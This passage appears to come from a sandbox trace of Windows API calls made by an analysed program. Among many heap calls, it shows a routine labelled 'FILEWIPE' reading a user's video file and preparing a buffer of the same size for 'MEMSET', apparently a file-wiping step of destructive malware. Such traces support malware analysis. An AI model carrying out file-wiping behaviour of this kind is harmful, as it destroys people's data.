out: hHeap=0x770000) returned 1 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0043.092] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0043.092] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0043.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4a8 [0043.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0043.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0043.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0043.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0043.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889610 [0043.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0043.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0043.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0043.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0043.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0043.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0043.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0043.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0043.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0043.093] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0043.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0043.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0043.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.094] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\h1ibodoxi-.flv")) returned 0x20 [0043.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0043.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.094] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0043.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0043.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0043.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.094] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9117ea0, ftCreationTime.dwHighDateTime=0x1d5bdcf, ftLastAccessTime.dwLowDateTime=0x86c483b0, ftLastAccessTime.dwHighDateTime=0x1d5c557, ftLastWriteTime.dwLowDateTime=0x86c483b0, ftLastWriteTime.dwHighDateTime=0x1d5c557, nFileSizeHigh=0x0, nFileSizeLow=0x108fc, dwReserved0=0x0, dwReserved1=0x777648, cFileName="H1IbodoXI-.flv", cAlternateFileName="H1IBOD~1.FLV")) returned 0x7c2100 [0043.094] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0043.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0043.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0043.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.095] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0043.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0043.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0043.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0043.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0043.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0043.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0043.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0043.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0043.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0043.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0043.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0043.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0043.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0043.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0043.096] CharLowerBuffW (in: lpsz="byte[67836]", cchLength=0xb | out: lpsz="byte[67836]") returned 0xb [0043.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac2f0 [0043.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0043.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0043.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0043.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0043.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0043.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0043.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0043.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0043.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x108fc) returned 0xab2010 [0043.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0043.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0043.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0043.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0043.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0043.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0043.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0043.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0043.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0043.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac320 [0043.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0043.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0043.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac2f0 | out: hHeap=0x770000) returned 1 [0043.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.098] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0043.098] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0043.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0043.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0043.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af478 [0043.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0043.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0043.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0043.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0043.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0043.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0043.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac2f0 [0043.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0043.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac2f0 | out: hHeap=0x770000) returned 1 [0043.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0043.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0043.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af378 [0043.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0043.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5f8 [0043.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0043.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce68 [0043.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0043.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0043.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0043.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0043.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0043.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0043.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0043.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0043.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0043.099] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0043.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af538 [0043.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0043.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0043.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0043.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af538 [0043.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0043.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0043.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0043.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af538 [0043.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0043.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0043.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0043.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af538 [0043.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0043.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0043.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af538 [0043.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0043.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0043.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af538 [0043.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0043.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0043.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0043.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af538 [0043.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0043.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0043.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af538 [0043.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0043.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0043.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0043.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0043.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0043.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af538 [0043.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0043.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0043.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0043.101] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0043.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0043.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0043.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0043.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0043.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0043.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.101] RtlAllocateHeap 